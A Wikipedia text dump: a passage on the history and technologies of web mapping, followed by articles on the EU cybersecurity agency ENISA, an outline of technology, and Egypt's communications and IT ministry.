Web maps support hyperlinking to other information on the web. Just like any other web page or a wiki, web maps can act like an index to other information on the web. Any sensitive area in a map, a label text, etc. can provide hyperlinks to additional information. As an example a map showing public transport options can directly link to the corresponding section in the online train time table. However, development of web maps is complicated enough as it is: Despite the increasing availability of free and commercial tools to create web mapping and web GIS applications, it is still a more complex task to create interactive web maps than to typeset and print images. Many technologies, modules, services and data sources have to be mastered and integrated The development and debugging environments of a conglomerate of different web technologies is still awkward and uncomfortable.
History
This section contains some of the milestones of web mapping, online mapping services and atlases.
1989: Birth of the WWW, WWW invented at CERN for the exchange of research documents.
1993: Xerox PARC Map Viewer, The first mapserver based on CGI/Perl, allowed reprojection styling and definition of map extent.
1994: The National Atlas of Canada, The first version of the National Atlas of Canada was released. Can be regarded as the first online atlas.
1995: The Gazetteer for Scotland, The prototype version of the Gazetteer for Scotland was released. The first geographical database with interactive mapping.
1995: Tiger Mapping Service, from the U.S. Census Bureau, the first national street-level web map, and the first major web map from the U.S. government.
1995: MapGuide, First introduced as Argus MapGuide.
1996: Center for Advanced Spatial Technologies Interactive Mapper, Based on CGI/C shell/GRASS would allow the user to select a geographic extent, a raster base layer, and number of vector layers to create personalized map.
1996: Mapquest, The first popular online Address Matching and Routing Service with mapping output.
1996: MultiMap, The UK-based MultiMap website launched offering online mapping, routing and location based services. Grew into one of the most popular UK web sites.
1996: MapGuide, Autodesk acquired Argus Technologies.and introduced Autodesk MapGuide 2.0.
1997: US Online National Atlas Initiative, The USGS received the mandate to coordinate and create the online National Atlas of the United States.
1997: UMN MapServer 1.0, Developed at the University of Minnesota (UMN) as Part of the NASA ForNet Project. Grew out of the need to deliver remote sensing data across the web for foresters.
1998: Terraserver USA, A Web Map Service serving aerial images (mainly b+w) and USGS DRGs was released. One of the first popular WMS. This service is a joint effort of USGS, Microsoft and HP.
2003: NASA World Wind, NASA World Wind Released. An open virtual globe that loads data from distributed resources across the internet. Terrain and buildings can be viewed 3 dimensionally. The (XML based) markup language allows users to integrate their own personal content. This virtual globe needs special software and doesn't run in a web browser.
2004: OpenStreetMap, an open source, open content world map founded by Steve Coast.
2004: Yandex Maps is founded.
2005: Google Maps, The first version of Google Maps. Based on raster tiles organized in a quad tree scheme, data loading done with XMLHttpRequests. This mapping application became highly popular on the web, also because it allowed other people to integrate google map services into their own website.
2005: MapGuide Open Source introduced as open source by Autodesk
2005: Google Earth, The first version of Google Earth was released building on the virtual globe metaphor. Terrain and buildings can be viewed 3 dimensionally. The KML (XML based) markup language allows users to integrate their own personal content. This virtual globe needs special software and doesn't run in a web browser.
2005: OpenLayers, the first version of the open source Javascript library OpenLayers.
2006: WikiMapia is launched
2009: Nokia made Ovi Maps free on its smartphones.
2012: Apple Maps, the first vector-tile based mapping app, is launched, replacing Apple's own Google Maps client as the default mapping app for its platforms.
2020: Petal Maps is released.
Technologies
Web mapping technologies require both server-side and client-side applications. The following is a list of technologies utilized in web mapping.
Spatial databases are usually object relational databases enhanced with geographic data types, methods and properties. They are necessary whenever a web mapping application has to deal with dynamic data (that changes frequently) or with huge amount of geographic data. Spatial databases allow spatial queries, sub selects, reprojections, and geometry manipulations and offer various import and export formats. PostGIS is a prominent example; it is open source. MySQL also implements some spatial features. Oracle Spatial, Microsoft SQL Server (with the spatial extensions), and IBM DB2 are the commercial alternatives. The Open Geospacial Consortium's (OGC) specification "Simple Features" is a standard geometry data model and operator set for spatial databases. Part 2 of the specification defines an implementation using SQL.
Tiled web maps display rendered maps made up of raster image "tiles".
Vector tiles are also becoming more popular—Google and Apple have both transitioned to vector tiles. Mapbox.com also offers vector tiles. This new style of web mapping is resolution independent, and also has the advantage of dynamically showing and hiding features depending on the interaction.
WMS servers generate maps using parameters for user options such as the order of the layers, the styling and symbolization, the extent of the data, the data format, the projection, etc. The OGC standardized these options. Another WMS server standard is the Tile Map Service. Standard image formats include PNG, JPEG, GIF and SVG.
Impact on society
Web maps have become an essential tool for many, as illustrated by a 2021 labor strike demanding (among other things) a certain type of map.
See also
Online cadastral map
Comparison of web map services
Geographic Information Systems (GIS)
List of online map services
Neogeography
Geoweb
Public Participation GIS (PPGIS)
Soundmap
Volunteered Geographic Information (VGI)
Notes and references
Further reading
Fu, P., and J. Sun. 2010. Web GIS: Principles and Applications. ESRI Press. Redlands, CA. .
Graham, M. 2010. Neogeography and the Palimpsests of Place. Tijdschrift voor Economische en Sociale Geografie. 101(4), 422-436.
Kraak, Menno-Jan and Allan Brown (2001): Web Cartography – Developments and prospects, Taylor & Francis, New York, .
Mitchell, Tyler (2005): Web Mapping Illustrated, O'Reilly, Sebastopol, 350 pages, . This book discusses various Open Source Web Mapping projects and provides hints and tricks as well as examples.
Peterson, Michael P. (ed.) (2014): Mapping in the Cloud, Guilford, .
Peterson, Michael P. (ed.) (2003): Maps and the Internet, Elsevier, .
Rambaldi G, Chambers R., McCall M, And Fox J. 2006. Practical ethics for PGIS practitioners, facilitators, technology intermediaries and researchers. PLA 54:106-113, IIED, London, UK
Gaffuri J, 2012. Toward web mapping with vector data. Vol. 7478 of Lecture Notes in Computer Science. Springer, Ch. 7, pp. 87–101. DOI:10.1007/978-3-642-33024-7_7
Feldman, S 2010. History of Web Mapping - slide deck and History of Web Mapping - mind map
External links
Sites
UMN MapServer documentation and tutorials
Webmapping with SVG, Postgis and UMN MapServer tutorials
International Cartographic Association (ICA), the world body for mapping and GIScience professionals
Comparison of Online Mapping Tools, Duke University
|
3311621
|
https://en.wikipedia.org/wiki/European%20Union%20Agency%20for%20Cybersecurity
|
European Union Agency for Cybersecurity
|
The European Union Agency for Cybersecurity – self-designation ENISA from the abbreviation of its original name – is an agency of the European Union. It is fully operational since September 1, 2005. The Agency is located in Athens, Greece and has a second office in Heraklion, Greece.
ENISA was created in 2004 by EU Regulation No 460/2004 under the name of European Network and Information Security Agency. ENISA's Regulation is the EU Regulation No 2019/881 of the European Parliament and of the Council of 17 April 2019 on ENISA (the European Union Agency for Cybersecurity) and on information and communications technology cybersecurity certification and repealing EU Regulation No 526/2013 (Cybersecurity Act). The Agency works closely together with the EU Members States and other stakeholders to deliver advice and solutions as well as improving their cybersecurity capabilities. It also supports the development of a cooperative response to large-scale cross-border cybersecurity incidents or crises and since 2019, it has been drawing up cybersecurity certification schemes.
ENISA assists the Commission, the member states and, consequently, the business community in meeting the requirements of network and information security, including present and future EU legislation. ENISA ultimately strives to serve as a centre of expertise for both member states and EU Institutions to seek advice on matters related to network and information security.
ENISA has been supporting the organization of the "Cyber Europe" pan-European cybersecurity exercises since 2010.
Organisation
ENISA is managed by the executive director and supported by a staff composed of experts representing stakeholders such as the information and communication technologies industry, consumer groups and academic experts. The agency is overseen by the executive board and the management board, which are composed of representatives from the EU member states, the EU Commission and other stakeholders.
Set up in 2004 as an informal point of reference into the member states, as of 27 June 2019 the National Liaison Officers network has become a statutory body of ENISA. The National Liaison Officers Network facilitates the exchange of information between ENISA and the member states. The agency is also assisted by the Advisory Group which is composed of “nominated members” and members appointed “ad personam”, all in total 33 members from all over Europe. The advisory group focuses on issues relevant to stakeholders and brings them to the attention of ENISA.
In order to carry out its tasks, the agency has a budget of nearly €17 million for the year 2019 and 70 statutory staff members. In addition, the agency employs a number of other employees including seconded national experts, trainees and interim agents. There are plans for additional experts to be integrated into the agency following the entering into force of Regulation 2019/881.
History
In 2007, European Commissioner Viviane Reding proposed that ENISA be folded into a new European Electronic Communications Market Authority (EECMA). By 2010, Commissioner Neelie Kroes signalled that the European Commission wanted a reinforced agency. The agency mandate was extended up to 2012 with an annual budget of €8 million, under the leadership of Dr. Udo Helmbrecht. The last extension of ENISA's mandate before it became permanent was done by the EU Regulation 526/2013 of the European Parliament and of the Council of 21 May 2013, repealing Regulation (EC) 460/2004. As of 27 June 2019, ENISA has been established for an indefinite period.
ENISA headquarters, including its administration and support functions, were originally based in Heraklion, Greece. The choice of a rather remote site was contentious from the outset, particularly since Greece held the EU presidency when the agency’s mandate was being negotiated. In addition, the agency has had a liaison office in Athens since October 2009. In 2013, it moved one-third of its staff of then sixty from Crete to Athens. In 2016, the Committee on Budgets backed ENISA’s bid to shut down the Heraklion office. Since 2019, ENISA has two offices; Its headquarters in Athens and a second office in Heraklion, Greece. In June 2021, the European Commission gave their consent to the establishment of an ENISA office in Brussels.
Executive director
2004 - October 2009 : Mr Andrea Pirotti (an Italian national and former Vice-President of Marconi Communications)
October 2009 – October 2019 : Dr Udo Helmbrecht (a German national and former president/director of the Federal Office for Information Security Germany)
since October 2019: Juhan Lepassaar (Estonia)
See also
Trans European Services for Telematics between Administrations (TESTA)
EUDRANET
European Cybercrime Centre
References
How the European Union works
External links
European Network and Information Security Agency
Agencies of the European Union
2005 establishments in Greece
2005 in the European Union
Government agencies established in 2005
Heraklion
Information technology organizations based in Europe
Organizations based in Crete
National cyber security centres
|
6504692
|
https://en.wikipedia.org/wiki/Outline%20of%20technology
|
Outline of technology
|
The following outline is provided as an overview of and topical guide to technology: collection of tools, including machinery, modifications, arrangements and procedures used by humans. Engineering is the discipline that seeks to study and design new technology. Technologies significantly affect human as well as other animal species' ability to control and adapt to their natural environments.
Components of technology
Man-made
Branches of technology
Aerospace – flight or transport above the surface of the Earth.
Space exploration – the physical investigation of the space more than 100 km above the Earth by either crewed or uncrewed spacecraft.
General aviation
Aeronautics
Astronautics
Aerospace engineering
Applied physics – physics which is intended for a particular technological or practical use. It is usually considered as a bridge or a connection between "pure" physics and engineering.
Agriculture – cultivation of plants, animals, and other living organisms.
Fishing – activity of trying to catch fish. Fish are normally caught in the wild. Techniques for catching fish include hand gathering, spearing, netting, angling and trapping.
Fisheries – a fishery is an entity engaged in raising or harvesting fish which is determined by some authority to be a fishery. According to the FAO, a fishery is typically defined in terms of the "people involved, species or type of fish, area of water or seabed, method of fishing, class of boats, purpose of the activities or a combination of the foregoing features".
Fishing industry – industry or activity concerned with taking, culturing, processing, preserving, storing, transporting, marketing or selling fish or fish products. It is defined by the FAO as including recreational, subsistence and commercial fishing, and the harvesting, processing, and marketing sectors.
Forestry – art and science of tree resources, including plantations and natural stands. The main goal of forestry is to create and implement systems that allow forests to continue a sustainable provision of environmental supplies and services.
Organic gardening and farming
Sustainable agriculture
Communication –
Books –
Telecommunication – the transfer of information at a distance, including signaling, telegraphy, telephony, telemetry, radio, television, and data communications.
Radio – Aural or encoded telecommunications.
Internet – the global system of interconnected computer networks that use the standard Internet Protocol Suite (TCP/IP).
Technology of television –
Television broadcasting – Visual and aural telecommunications.
Computing – any goal-oriented activity requiring, benefiting from, or creating computers. Computing includes designing and building hardware and software systems; processing, structuring, and managing various kinds of information; doing scientific research on and with computers; making computer systems behave intelligently; creating and using communications and entertainment media; and more.
Computer engineering – discipline that integrates several fields of electrical engineering and computer science required to develop computer systems, from designing individual microprocessors, personal computers, and supercomputers, to circuit design.
Computers – general purpose devices that can be programmed to carry out a finite set of arithmetic or logical operations. Since a sequence of operations can be readily changed, computers can solve more than one kind of problem.
Computer science – the study of the theoretical foundations of information and computation and of practical techniques for their implementation and application in computer systems.
Artificial intelligence – intelligence of machines and the branch of computer science that aims to create it.
Natural language processing –
Object recognition – in computer vision, this is the task of finding a given object in an image or video sequence.
Cryptography – the technology to secure communications in the presence of third parties.
Human-computer interaction
Information technology – the acquisition, processing, storage and dissemination of vocal, pictorial, textual and numerical information by a microelectronics-based combination of computing and telecommunications.
Software engineering – the systematic approach to the development, operation, maintenance, and retirement of computer software.
Programming – the process of designing, writing, testing, debugging, and maintaining the source code of computer programs.
Software development – development of a software product, which entails computer programming (process of writing and maintaining the source code), but also encompasses a planned and structured process from the conception of the desired software to its final manifestation.
Web design and web development –
C++ – one of the most popular programming languages with application domains including systems software, application software, device drivers, embedded software, high-performance server and client applications, and entertainment software such as video games.
Perl – high-level, general-purpose, interpreted, dynamic programming language. Used for text processing, CGI scripting, graphics programming, system administration, network programming, finance, bioinformatics, and more.
Software – one or more computer programs and data held in the storage of the computer for one or more purposes. In other words, software is a set of programs, procedures, algorithms and its documentation concerned with the operation of a data processing system.
Free software – software that can be used, studied, and modified without restriction.
Search engines – information retrieval systems designed to help find information stored on a computer system.
Internet – the global system of interconnected computer networks that use the standard Internet Protocol Suite (TCP/IP).
World Wide Web –
Computer industry
Apple Inc. – manufacturer and retailer of computers, hand-held computing devices, and related products and services.
Google – Google Inc. and its Internet services including Google Search.
Construction – building or assembly of any physical structure.
Design – the art and science of creating the abstract form and function for an object or environment.
Architecture – the art and science of designing buildings.
Electronics – Electronics comprises the physics, engineering, technology and applications that deal with the emission, flow and control of electrons in vacuum and matter.
Energy – In physics, energy is the quantitative property that must be transferred to an object in order to perform work on, or to heat, the object.
Energy development – ongoing effort to provide abundant, efficient, and accessible energy resources through knowledge, skills, and construction.
Energy storage – the storage of a form of energy that can then be used later.
Nuclear technology – the technology and application of the spontaneous and induced reactions of atomic nuclei.
Wind energy – wind energy is the use of wind to provide the mechanical power through wind turbines to turn electric generators and traditionally to do other work, like milling or pumping.
Solar energy – Solar energy is radiant light and heat from the Sun that is harnessed using a range of ever-evolving technologies such as solar heating, photovoltaics, solar thermal energy, solar architecture, molten salt power plants and artificial photosynthesis.
Engineering – the application of science, mathematics, and technology to produce useful goods and systems.
Chemical engineering – the technology and application of chemical processes to produce useful materials.
Computer engineering – Computer engineering (CE) is a branch of engineering that integrates several fields of computer science and electronic engineering required to develop computer hardware and software.
Control engineering – Control engineering or control systems engineering is an engineering discipline that applies automatic control theory to design systems with desired behaviors in control environments.
Electrical engineering – the technology and application of electromagnetism, including electricity, electronics, telecommunications, computers, electric power, magnetics, and optics.
Climate engineering – the large-scale manipulation of a specific process central to controlling Earth’s climate for the purpose of obtaining a specific benefit.
Software engineering – the technology and application of a systematic approach to the development, operation, maintenance, and retirement of computer software.
Firefighting – act of extinguishing fires. A firefighter fights fires to prevent destruction of life, property and the environment. Firefighting is a professional technical skill.
Forensic science – application of a broad spectrum of sciences to answer questions of interest to a legal system. This may be in relation to a crime or a civil action.
Health
Biotechnology – applied biology that involves the use of living organisms and bioprocesses in engineering, technology, medicine and other fields requiring bioproducts.
Ergonomics – the study of designing equipment and devices that fit the human body, its movements, and its cognitive abilities.
Hydrology – The study of the movement, distribution, and quality of water on Earth and other planets, including the hydrologic cycle, water resources and environmental watershed sustainability.
Industry – production of an economic good or service.
Automation – use of machinery to replace human labor.
Industrial machinery –
Machines – devices that perform or assist in performing useful work.
Manufacturing – use of machines, tools and labor to produce goods for use or sale. The term may refer to a range of human activity, from handicraft to high tech, but is most commonly applied to industrial production, in which raw materials are transformed into finished goods on a large scale.
Robotics – deals with the design, construction, operation, structural disposition, manufacture and application of robots.
Object recognition
Information science –
Cartography – the study and practice of making maps. Combining science, aesthetics, and technique, cartography builds on the premise that reality can be modeled in ways that communicate spatial information effectively.
Library science – technology related to libraries and the information fields.
Military science – the study of the technique, psychology, practice and other phenomena which constitute war and armed conflict.
Mining – extraction of mineral resources from the earth.
Nanotechnology – The study of manipulating matter on an atomic and molecular scale. Generally, nanotechnology deals with structures sized between 1 and 100 nanometre in at least one dimension, and involves developing materials or devices possessing at least one dimension within that size.
Prehistoric technology – technologies that emerged before recorded history (i.e., before the development of writing).
Quantum technology –
Sustainability – capacity to endure. In ecology, the word describes how biological systems remain diverse and productive over time. Long-lived and healthy wetlands and forests are examples of sustainable biological systems. For humans, sustainability is the potential for long-term maintenance of well being, which has environmental, economic, and social dimensions.
Transport – the transfer of people or things from one place to another.
Rail transport – means of conveyance of passengers and goods by way of wheeled vehicles running on rail tracks consisting of steel rails installed on sleepers/ties and ballast.
Vehicles – mechanical devices for transporting people or things.
Automobiles – human-guided powered land-vehicles.
Bicycles – human-powered land-vehicles with two or more wheels.
Motorcycles – single-track, engine-powered, motor vehicles. They are also called motorbikes, bikes, or cycles.
Vehicle components
Tires – ring-shaped coverings that fit around wheel rims
Technology by region
Science and technology in Africa
Science and technology in Algeria
Science and technology in Angola
Science and technology in Morocco
Science and technology in South Africa
Science and technology in Asia
Science and technology in Bangladesh
Science and technology in China
Science and technology in India
Science and technology in Indonesia
Science and technology in Iran
Science and technology in Israel
Science and technology in Japan
Science and technology in Malaysia
Science and technology in Pakistan
Science and technology in the Philippines
Science and technology in Russia
Science and technology in Turkey
Science and technology in Europe
Science and technology in Albania
Science and technology in Belgium
Science and technology in Brussels
Science and technology in Flanders
Science and technology in Wallonia
Science and technology in Bulgaria
Science and technology in France
Science and technology in Germany
Science and technology in Hungary
Science and technology in Iceland
Science and technology in Italy
Science and technology in Portugal
Science and technology in Romania
Science and technology in Russia
Science and technology in Spain
Science and technology in Switzerland
Science and technology in Ukraine
Science and technology in the United Kingdom
Science and technology in North America
Science and technology in Canada
Science and technology in the United States
Science and technology in Jamaica
Science and technology in South America
Science and technology in Argentina
Science and technology in Colombia
Science and technology in Venezuela
History of technology
History of technology
Timelines of technology Man vs. Technology
Technology museum –
History of technology by period
Prehistoric technology (outline)
Control of fire by early humans
Ancient technology – c. 800 BCE – 476 CE
Ancient Egyptian technology –
Obelisk making technology in ancient Egypt –
Ancient Greek technology – c. 800 BCE – 146 BCE
Ancient Roman technology – c. 753 BCE – 476 CE
Science and technology of the Han dynasty – 206 BCE – 220 CE
Science and technology of the Tang dynasty – 618–907
Science and technology of the Song dynasty – 960–1279 CE
Medieval technology – 5th to 15th century
Byzantine technology – 5th to 15th century
Islamic Golden Age – 8th to 13th century
Science and technology in the Ottoman Empire – 14th to 20th century
Industrial revolution – 18th to 19th century
Second Industrial Revolution – 1820–1914
Technology during World War I – 1914–1918
Technology during World War II – 1939–1945
Allied technological cooperation during World War II –
American military technology during World War II –
German military technology during World War II –
1970s in science and technology
1980s in science and technology
1990s in science and technology
2000s in science and technology
2010s in science and technology
Technological ages
Media about the history of technology
Connections – documentary television series and 1978 book ("Connections" based on the series) created, written and presented by science historian James Burke. It took an interdisciplinary approach to the history of science and invention and demonstrated how various discoveries, scientific achievements, and historical world events were built from one another successively in an interconnected way to bring about particular aspects of modern technology. There were 3 seasons produced, and they aired in 1978, 1994, and 1997.
The Day the Universe Changed – documentary television series written and presented by science historian James Burke, originally broadcast in 1985 by the BBC. The series' primary focus is on the effect of advances in science and technology on western society in its philosophical aspects. Ran for one season, in 1986.
History of technology by region
History of science and technology in the Mediterranean
Ancient Greek technology –
Ancient Roman technology –
Timeline of Polish science and technology –
History of science and technology in Africa –
History of science and technology in Asia
History of science and technology in China –
Science and technology of the Han dynasty –
Science and technology of the Tang dynasty –
Science and technology of the Song dynasty –
History of science and technology in the People's Republic of China –
History of science and technology in the Indian subcontinent –
Science and technology in ancient India –
History of science and technology in Korea –
Science and Technology in the Ottoman Empire –
Science and technology in the Soviet Union –
History of science and technology in North America
United States technological and industrial history –
History of science and technology in Mexico –
Technological and industrial history of Canada –
Technological and industrial history of 20th-century Canada –
Technological and industrial history of 21st-century Canada –
Technological and industrial history of the People's Republic of China –
Technological and industrial history of the United States –
History of technology by field
History of invention
History of aerospace
History of artificial intelligence
History of agriculture
History of agricultural science
History of architecture, timeline
History of biotechnology
History of cartography
History of chemical engineering
History of communication
History of computing, timeline
History of computer science
History of computing hardware
History of the graphical user interface
History of hypertext, timeline
History of the Internet, Internet phenomena
History of the World Wide Web
History of operating systems
History of programming languages, timeline
History of software engineering
History of electrical engineering
History of energy development
History of engineering
History of industry
History of library and information science
History of microscopy
History of manufacturing
History of the factory
History of mass production
History of materials science, timeline
History of measurement
History of medicine
History of motor and engine technology
History of military science
History of transport, timeline
History of biotechnology –
Timeline of biotechnology –
History of display technology –
History of film technology –
History of information technology auditing –
History of military technology –
History of nanotechnology –
History of science and technology –
History of web syndication technology –
Timeline of agriculture and food technology –
Timeline of clothing and textiles technology –
Timeline of communication technology –
Timeline of diving technology –
Timeline of heat engine technology –
Timeline of hypertext technology –
Timeline of lighting technology –
Timeline of low-temperature technology –
Timeline of materials technology –
Timeline of medicine and medical technology –
Timeline of microscope technology –
Timeline of motor and engine technology –
Timeline of particle physics technology –
Timeline of photography technology –
Timeline of rocket and missile technology –
Timeline of telescope technology –
Timeline of telescopes, observatories, and observing technology –
Timeline of temperature and pressure measurement technology –
Timeline of time measurement technology –
Timeline of transportation technology –
Hypothetical technology
Potential technology of the future includes:
Hypothetical technology –
Femtotechnology – hypothetical term used in reference to structuring of matter on the scale of a femtometer, which is 10−15 m. This is a smaller scale in comparison to nanotechnology and picotechnology which refer to 10−9 m and 10−12 m respectively. Work in the femtometer range involves manipulation of excited energy states within atomic nuclei (see nuclear isomer) to produce metastable (or otherwise stabilized) states with unusual properties.
Philosophy of technology
Management of technology
Advancement of technology
Politics of technology
Politics and technology
AI takeover
Accelerating change
Format war
Information privacy
IT law
PEST analysis
Robot rights
Technological singularity
Technological sovereignty
Economics of technology
Energy accounting
Nanosocialism
Post-scarcity economy
Technocracy
Technocapitalism
Technological diffusion
Technology acceptance model
Technology lifecycle
Technology transfer
Technology education
Technology education
Technology museums
Technology organizations
Science and technology think tanks
Applied Biomathematics
Battelle Memorial Institute
Cicada 3301
Council for Scientific and Industrial Research
Edge Foundation, Inc.
Eudoxa
Federation of American Scientists
Free Software Foundation
GTRI Office of Policy Analysis and Research
Information Technology and Innovation Foundation
Institute for Science and International Security
Institute for the Encouragement of Scientific Research and Innovation of Brussels
Keck Institute for Space Studies
Kestrel Institute
Malaysian Industry-Government Group for High Technology
Moore Center for Theoretical Cosmology and Physics
Pakistan Council of Scientific and Industrial Research
Piratbyrån
RAND Corporation
Regional Center for Renewable Energy and Energy Efficiency
Res4Med
Richard Dawkins Foundation for Reason and Science
Swecha
Wau Holland Foundation
Technology media
For historical treatments, see Media about the history of technology, above Technology journalism –
Books on technology
Engines of Creation –
Technology periodicals
Engadget –
TechCrunch –
Wired –
Websites
The Verge Fictional technology
Fictional technology –
In Death technology –
Technology in Star Trek –
Technology in Star Wars –
Technology in science fiction –
Technology of Robotech –
List of technology in the Dune universe –
Persons influential in technology
List of engineers
List of inventors
List of scientists
See also
Outline of applied science
Further reading
Huesemann, M.H., and J.A. Huesemann (2011). Technofix: Why Technology Won’t Save Us or the Environment, New Society Publishers, .
.
Kevin Kelly. What Technology Wants. New York, Viking Press, 14 October 2010, hardcover, 416 pages.
Mumford, Lewis. (2010). Technics and Civilization. University of Chicago Press, .
Rhodes, Richard. (2000). Visions of Technology: A Century of Vital Debate about Machines, Systems, and the Human World. Simon & Schuster, .
Teich, A.H. (2008). Technology and the Future. Wadsworth Publishing, 11th edition, .
Wright, R.T. (2008). Technology. Goodheart-Wilcox Company, 5th edition, .
References
External links
Technology news
BBC on technology
Bloomberg on technology
MIT Technology Review
New York Times technology section
Wired
Miscellaneous topics
Note: these topics need to be placed in the outline above. Some may be irrelevant and those should be removed. New sections may be needed in the outline to provide a suitable place for some of these items. Annotations by way of short descriptions may help decide where a link should go.''
application of modern information technology in activities related to dance: in dance education, choreography, performance, and research.
Technofile
Technology
Technology
|
28559511
|
https://en.wikipedia.org/wiki/Ministry%20of%20Communications%20and%20Information%20Technology%20%28Egypt%29
|
Ministry of Communications and Information Technology (Egypt)
|
The Egyptian Ministry of Communications and Information Technology (MCIT) is the government body responsible for information and communications technology (ICT) issues in the Arab Republic of Egypt. Established in 1999, MCIT is responsible for the planning, implementation and operation of government ICT plans and strategies.
MCIT is led by the Minister of Communications and Information Technology, who is nominated by the Prime Minister and is a member of the cabinet. The current ICT Minister is Amr Talaat who assumed the position on 14 June 2018.
MCIT is headquartered in Smart Village Egypt, in 6th of October, Giza Governorate, in the Cairo metropolitan area.
Background
In September 1999, former President Hosni Mubarak announced the inauguration of a national program to develop the information and communication technology sector in Egypt. The goals of the program were to foster the development of an information society in Egypt and stimulate the growth of a strong, competitive, vibrant, export-oriented ICT sector. The cornerstone of this program was the establishment of the ministry of, in October 1999, to lead these efforts.
MCIT, then headed by Ahmed Nazif, soon launched a national plan for communications and information technology, establishing projects and initiatives, including the Egyptian Information Society Initiative (EISI), geared to support and empower public-private partnerships to develop and expand telecommunications infrastructure; provide ICT access to all citizens; develop meaningful Arabic content; establish a large pool of trained ICT professionals to create and innovate; build a policy framework and support infrastructure to foster the growth of a powerful and competitive ICT industry; and leverage ICT to empower development in health, education, government, commerce, culture and other areas.
Vision and mission
Egypt's Ministry of Communications and Information Technology was established to facilitate the country's assimilation into the global information society. Its mandate is to support the development of the local ICT industry, thereby boosting exports and creating jobs, promoting the use of ICT nationwide as a means to achieve national development goals, and building the foundations of a knowledge society in Egypt—in close collaboration with other governmental, civil society and private sector entities.[3]
Since its establishment, MCIT—in partnership with other government bodies, non-governmental organizations and the private sector—has worked to develop the foundational infrastructure and framework for an information society in Egypt. Following the conclusion of the Egyptian Information Society Initiative in 2006, MCIT initiated the 2007 - 2010 strategy with the objective of further restructuring the sector, developing a knowledge society and supporting the ICT industry with a focus on expanding exports of ICT products and services. According to the 2010 ICT Strategy, the ministry's main priorities are to:
Continue development of a state-of-the-art ICT infrastructure that provides an enabling environment for government and businesses throughout Egypt and links it globally
Create a vibrant and export-oriented ICT industry
Leverage public-private partnerships as an implementation mechanism whenever possible
Enable society to absorb and benefit from expanding sources of information
Create a learning community whose members have access to all the resources and information they require regardless of gender and location, thereby allowing all to achieve their full potential and play a part in the country's socioeconomic development
Support skills development required by the ICT industry
Support research and innovation in ICT
MCIT new 2014- 2018 strategy primarily considers the political and economic changes taking place in Egypt, the development of the communications sector both regionally and internationally and Egypt's national development priorities.
Ministers
A relatively new entity, MCIT was established in October 1999. Ahmed Nazif served as the first minister from 1999 to 2004. His successor, Tarek Kamel, served as minister from July 2004 to February 2011. Magued Osman was appointed as the ICT minister in the caretaker government from February to July 2011. Mohamed Salem then held the position until 2 August 2012, and was replaced by Hany Mahmoud who was appointed on that date. In January 2013, Atef Helmy assumed the position, and in March 2015, Khaled Negm was appointed as the ICT minister. Yasser ElKady was appointed in 19 September 2015. The current ICT minister is Amr Talaat who assumed position on 14 June 2018.
Initiatives
MCIT initiatives and objectives include the following:
ICT sector restructuring, including legislative reform, to create a market more appealing to local and foreign investment
Free Internet: a service launched in January 2002 by Telecom Egypt, in partnership with the majority of the country's Internet service providers, eliminating monthly subscription fees for dial-up Internet access, with users required only to pay the price of the local phone call to connect to the network
Broadband Initiative: launched in May 2004 to increase the availability of high-speed broadband connections at reduced flat rates and to promote public awareness of the advantages of broadband Internet access over dial-up access
Fixed and Mobile Licensing Program: this resulted in a national roaming agreement signed by the three mobile operators (Orange Egypt, Vodafone Egypt and Etisalat Egypt) and the National Telecommunications Regulatory Authority (NTRA) in June 2007 to provide users with expanded 3G services
Launch of the country's code top-level domain “.misr”
Postal sector reform program: launched in 2002 to modernize Egypt Post by improving services, expanding capabilities and developing new revenue streams
Enhancing the framework governing the use of ICT networks and services
ICT for Development: a group of projects designed to leverage the potential of ICT to help Egypt achieve its human development goals and improve the lives of citizens using public-private partnerships to facilitate the planning, implementation, analysis and dissemination of projects throughout all sectors of the economy, including health, education, culture and government services
Promoting innovation and ICT industry development, including research and development, training, investment and e-business
Establishing technology parks, including Smart Village and Maadi Contact Centers Park
Developing mutually beneficial partnerships with governments and agencies, civil society organizations and multilateral organizations around the world to share expertise and explore and develop opportunities
Developing a digital economy with the World Bank
Affiliate Organizations
National Telecommunications Regulatory Authority
The National Telecommunications Regulatory Authority of Egypt (NTRA) was founded in 2003 according to the Telecommunications Regulation Law as a national authority to administer the telecommunication sector. The scope of NTRA work covers issues related to transparency, open competition, universal service and protection of user rights. NTRA acts as an independent arbiter for ICT sector stakeholders.
Information Technology Industry Development Agency
The Information Technology Industry Development Agency (ITIDA) was founded in 2004 as an executive IT arm of the Ministry Of Communications and Information Technology. Located in Smart Village, ITIDA is a government entity mandated to boost the development of the Egyptian IT sector and increase its global competitiveness. Affiliated to the Ministry of Communications and Information Technology, ITIDA is tasked with developing the IT industry through identifying the needs of local industry and addressing them with tailored programs. The agency's responsibilities also include enhancing the Egyptian cybersecurity and data protection framework to facilitate e-business and business process outsourcing (BPO) activities.
Through its Intellectual Property Rights (IPR) Office, ITIDA aims at ensuring effective enforcement of the Copyright Law, fighting piracy and sanctioning infringements in order to guarantee effective protection for computer programs and databases. The IPR Office works to raise awareness and understanding of intellectual property rights in the software community and for the public at large, and cooperates with different bodies concerned with IPR on both the national and international levels. The office also functions as a depository for computer programs and databases, provides licenses for reproducing and translating computer programs and databases for educational purposes, and issues mandatory permission to practice for software enterprises.
Egypt Post
Founded in 1865, the Egyptian National Post Organization (ENPO) is the largest provider of postal services in Egypt, providing services including the delivery of correspondence, documents, money and goods.
Information Technology Institute
The Information Technology Institute (ITI) was founded in 1992 by the Government of Egypt's Information and Decision Support Center (IDSC) to assist in paving the way for the evolution of a knowledge-based society by developing a new generation of professionals. Prime Minister Dr Ahmed Nazif shifted the affiliation of ITI to the Ministry of Communications and Information Technology in April 2005. Every year, ITI accepts a limited number of graduates of any discipline for its training program, which offers 14 various specializations.
National Telecommunication Institute
The National Telecommunication Institute (NTI), affiliated to the Ministry of Communications and Information Technology, was founded in 1984 as a scientific institute with university status. The institute specializes in training, education and research activities in the field of telecommunications.
The Center for Documentation of Cultural and Natural Heritage
The Center for Documentation of Cultural and Natural Heritage (CULTNAT) was established in January 2000 as a project operating under the auspices of the Ministry of Communications and Information Technology. In 2003, CULTNAT turned into an affiliate of MCIT and Bibliotheca Alexandrina. The center runs an array of projects and programs for the documentation of both the tangible and intangible aspects of Egypt's cultural and natural heritage, including archaeology, architecture, manuscripts, music, folklore, caricatures, plastic arts and natural resources.
The Technology Innovation and Entrepreneurship Center
The Technology Innovation and Entrepreneurship Center (TIEC) aims to drive innovation and entrepreneurship in the ICT field for the benefit of national economy. The center was launched at Smart Village in September 2010.
Related Institutions
Smart Village Egypt
